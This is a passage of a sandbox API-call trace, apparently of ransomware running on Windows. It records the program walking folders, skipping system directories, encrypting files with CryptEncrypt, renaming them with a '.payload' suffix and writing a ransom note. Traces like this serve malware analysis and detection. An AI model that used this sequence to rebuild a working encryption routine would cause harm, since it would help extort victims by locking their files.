lstrcmpW (lpString1=".", lpString2=".") returned 0 [0058.595] FindNextFileW (in: hFindFile=0x6067e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0058.595] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0058.595] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0058.595] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0058.595] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0058.595] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0058.595] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1033\\..") returned 33 [0058.595] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0058.595] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0058.595] FindNextFileW (in: hFindFile=0x6067e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd723cc00, ftCreationTime.dwHighDateTime=0x1cabb47, ftLastAccessTime.dwLowDateTime=0xd723cc00, ftLastAccessTime.dwHighDateTime=0x1cabb47, ftLastWriteTime.dwLowDateTime=0xd723cc00, ftLastWriteTime.dwHighDateTime=0x1cabb47, nFileSizeHigh=0x0, nFileSizeLow=0xc74, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0058.595] lstrcmpiW (lpString1="eula.rtf", lpString2="Windows") returned -1 [0058.595] lstrcmpiW (lpString1="eula.rtf", lpString2="$Recycle.bin") returned 1 [0058.595] lstrcmpiW (lpString1="eula.rtf", lpString2="System Volume Information") returned -1 [0058.596] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files") returned -1 [0058.596] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files (x86)") returned -1 [0058.596] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1033\\eula.rtf") returned 39 [0058.596] StrStrIW (lpFirst="eula.rtf", lpSrch=".payload") returned 0x0 [0058.596] lstrcmpW (lpString1="eula.rtf", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0058.596] lstrcmpW (lpString1="eula.rtf", lpString2="taridd") returned -1 [0058.596] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1033\\eula.rtf", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0058.596] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1033\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1033\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0058.596] GetTickCount () returned 0x114f166 [0058.596] GetTickCount () returned 0x114f166 [0058.596] GetTickCount () returned 0x114f166 [0058.596] GetTickCount () returned 0x114f166 [0058.596] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0058.596] GetProcessHeap () returned 0x5e0000 [0058.596] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x642a98 [0058.596] ReadFile (in: hFile=0x438, lpBuffer=0x642a98, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesRead=0x342f7e4*=0xc74, lpOverlapped=0x0) returned 1 [0058.597] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xfffff38c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0058.598] WriteFile (in: hFile=0x438, lpBuffer=0x642a98*, nNumberOfBytesToWrite=0xc74, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesWritten=0x342f7e4*=0xc74, lpOverlapped=0x0) returned 1 [0058.598] GetProcessHeap () returned 0x5e0000 [0058.598] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0058.598] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.598] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0058.598] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0058.598] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0058.598] CloseHandle (hObject=0x438) returned 1 [0058.599] GetProcessHeap () returned 0x5e0000 [0058.599] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x642a98 [0058.599] wnsprintfW (in: pszDest=0x642a98, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1033\\eula.rtf_r00t_{nhhHyu}.payload") returned 61 [0058.599] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1033\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1033\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1033\\eula.rtf_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\1033\\eula.rtf_r00t_{nhhhyu}.payload")) returned 1 [0058.601] GetProcessHeap () returned 0x5e0000 [0058.601] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0058.601] FindNextFileW (in: hFindFile=0x6067e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x47ad1a00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x47ad1a00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x47ad1a00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x12db0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0058.601] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Windows") returned -1 [0058.601] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="$Recycle.bin") returned 1 [0058.601] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="System Volume Information") returned -1 [0058.601] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files") returned -1 [0058.601] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files (x86)") returned -1 [0058.601] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1033\\LocalizedData.xml") returned 48 [0058.601] StrStrIW (lpFirst="LocalizedData.xml", lpSrch=".payload") returned 0x0 [0058.601] lstrcmpW (lpString1="LocalizedData.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0058.601] lstrcmpW (lpString1="LocalizedData.xml", lpString2="taridd") returned -1 [0058.601] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1033\\LocalizedData.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0058.601] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1033\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1033\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0058.700] GetTickCount () returned 0x114f1d3 [0058.700] GetTickCount () returned 0x114f1d3 [0058.700] GetTickCount () returned 0x114f1d3 [0058.700] GetTickCount () returned 0x114f1d3 [0058.700] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0058.700] GetProcessHeap () returned 0x5e0000 [0058.700] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x642a98 [0058.701] ReadFile (in: hFile=0x438, lpBuffer=0x642a98, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesRead=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0058.702] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0058.703] WriteFile (in: hFile=0x438, lpBuffer=0x642a98*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesWritten=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0058.703] GetProcessHeap () returned 0x5e0000 [0058.703] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0058.703] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.703] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0058.703] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0058.703] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0058.703] CloseHandle (hObject=0x438) returned 1 [0058.706] GetProcessHeap () returned 0x5e0000 [0058.706] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x642a98 [0058.706] wnsprintfW (in: pszDest=0x642a98, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1033\\LocalizedData.xml_r00t_{nhhHyu}.payload") returned 70 [0058.706] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1033\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1033\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1033\\LocalizedData.xml_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\1033\\localizeddata.xml_r00t_{nhhhyu}.payload")) returned 1 [0058.706] GetProcessHeap () returned 0x5e0000 [0058.706] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0058.706] FindNextFileW (in: hFindFile=0x6067e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4358, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0058.706] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Windows") returned -1 [0058.706] lstrcmpiW (lpString1="SetupResources.dll", lpString2="$Recycle.bin") returned 1 [0058.706] lstrcmpiW (lpString1="SetupResources.dll", lpString2="System Volume Information") returned -1 [0058.707] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files") returned 1 [0058.707] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files (x86)") returned 1 [0058.707] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1033\\SetupResources.dll") returned 49 [0058.707] StrStrIW (lpFirst="SetupResources.dll", lpSrch=".payload") returned 0x0 [0058.707] lstrcmpW (lpString1="SetupResources.dll", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0058.707] lstrcmpW (lpString1="SetupResources.dll", lpString2="taridd") returned -1 [0058.707] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1033\\SetupResources.dll", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0058.707] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1033\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1033\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0058.707] GetTickCount () returned 0x114f1d3 [0058.707] GetTickCount () returned 0x114f1d3 [0058.707] GetTickCount () returned 0x114f1d3 [0058.707] GetTickCount () returned 0x114f1d3 [0058.707] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0058.707] GetProcessHeap () returned 0x5e0000 [0058.707] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x642a98 [0058.707] ReadFile (in: hFile=0x438, lpBuffer=0x642a98, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesRead=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0058.710] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0058.710] WriteFile (in: hFile=0x438, lpBuffer=0x642a98*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesWritten=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0058.710] GetProcessHeap () returned 0x5e0000 [0058.710] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0058.710] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.710] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0058.710] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0058.710] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0058.711] CloseHandle (hObject=0x438) returned 1 [0058.712] GetProcessHeap () returned 0x5e0000 [0058.712] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x642a98 [0058.712] wnsprintfW (in: pszDest=0x642a98, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1033\\SetupResources.dll_r00t_{nhhHyu}.payload") returned 71 [0058.712] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1033\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1033\\setupresources.dll"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1033\\SetupResources.dll_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\1033\\setupresources.dll_r00t_{nhhhyu}.payload")) returned 1 [0058.712] GetProcessHeap () returned 0x5e0000 [0058.712] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0058.712] FindNextFileW (in: hFindFile=0x6067e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4358, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0058.712] FindClose (in: hFindFile=0x6067e0 | out: hFindFile=0x6067e0) returned 1 [0058.712] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1033\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 62 [0058.712] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1033\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\588bce7c90097ed212\\1033\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0058.713] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x3a6, lpNumberOfBytesWritten=0x342f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x342f7ec*=0x3a6, lpOverlapped=0x0) returned 1 [0058.714] CloseHandle (hObject=0x430) returned 1 [0058.714] GetProcessHeap () returned 0x5e0000 [0058.714] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x60fc68 | out: hHeap=0x5e0000) returned 1 [0058.714] FindNextFileW (in: hFindFile=0x606be0, lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="1035", cAlternateFileName="")) returned 1 [0058.714] lstrcmpiW (lpString1="1035", lpString2="Windows") returned -1 [0058.714] lstrcmpiW (lpString1="1035", lpString2="$Recycle.bin") returned 1 [0058.714] lstrcmpiW (lpString1="1035", lpString2="System Volume Information") returned -1 [0058.714] lstrcmpiW (lpString1="1035", lpString2="Program Files") returned -1 [0058.714] lstrcmpiW (lpString1="1035", lpString2="Program Files (x86)") returned -1 [0058.714] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1035") returned 30 [0058.714] lstrcmpW (lpString1="1035", lpString2=".") returned 1 [0058.714] lstrcmpW (lpString1="1035", lpString2="..") returned 1 [0058.714] lstrcmpW (lpString1="\\\\?\\C:\\588bce7c90097ed212\\1035", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0058.714] GetProcessHeap () returned 0x5e0000 [0058.714] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x60fc68 [0058.714] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1035\\*") returned 32 [0058.714] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1035\\*", lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0x606420 [0058.714] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0058.714] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0058.715] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0058.715] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0058.715] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0058.715] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1035\\.") returned 32 [0058.715] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0058.715] FindNextFileW (in: hFindFile=0x606420, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0058.715] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0058.715] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0058.715] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0058.715] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0058.715] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0058.715] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1035\\..") returned 33 [0058.715] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0058.715] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0058.715] FindNextFileW (in: hFindFile=0x606420, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xe76, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0058.715] lstrcmpiW (lpString1="eula.rtf", lpString2="Windows") returned -1 [0058.715] lstrcmpiW (lpString1="eula.rtf", lpString2="$Recycle.bin") returned 1 [0058.715] lstrcmpiW (lpString1="eula.rtf", lpString2="System Volume Information") returned -1 [0058.715] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files") returned -1 [0058.715] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files (x86)") returned -1 [0058.715] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1035\\eula.rtf") returned 39 [0058.715] StrStrIW (lpFirst="eula.rtf", lpSrch=".payload") returned 0x0 [0058.715] lstrcmpW (lpString1="eula.rtf", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0058.715] lstrcmpW (lpString1="eula.rtf", lpString2="taridd") returned -1 [0058.715] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1035\\eula.rtf", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0058.715] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1035\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1035\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0058.716] GetTickCount () returned 0x114f1e3 [0058.716] GetTickCount () returned 0x114f1e3 [0058.716] GetTickCount () returned 0x114f1e3 [0058.716] GetTickCount () returned 0x114f1e3 [0058.716] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0058.716] GetProcessHeap () returned 0x5e0000 [0058.716] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x642a98 [0058.716] ReadFile (in: hFile=0x438, lpBuffer=0x642a98, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesRead=0x342f7e4*=0xe76, lpOverlapped=0x0) returned 1 [0058.717] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xfffff18a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0058.717] WriteFile (in: hFile=0x438, lpBuffer=0x642a98*, nNumberOfBytesToWrite=0xe76, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesWritten=0x342f7e4*=0xe76, lpOverlapped=0x0) returned 1 [0058.718] GetProcessHeap () returned 0x5e0000 [0058.718] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0058.718] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.718] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0058.718] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, 